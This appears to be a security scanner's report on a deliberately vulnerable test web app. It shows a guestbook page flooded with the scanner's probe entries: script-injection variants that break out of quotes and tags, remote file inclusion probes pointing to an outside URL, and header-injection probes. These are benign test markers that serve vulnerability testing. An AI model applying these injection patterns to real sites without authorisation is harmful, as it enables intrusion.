<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Guestbook</h2> <h4>See what people are saying about us!</h4> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by */; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p> <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p> <p class="comment">1</p> <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p> <p class="comment"> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">*/; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p> <p> - by arachni_name </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">Hi, I love your site!</p> <p> - by adam </p> <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> <input type="text" name="name"><br> Comment: <br> <textarea id="comment-box" name="comment"></textarea> <br> <input type="submit" value="Submit"> </form> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Guestbook</h2> <h4>See what people are saying about us!</h4> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by */; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p> <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p> <p class="comment">1</p> <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p> <p class="comment"></script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">*/; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p> <p> - by arachni_name </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by 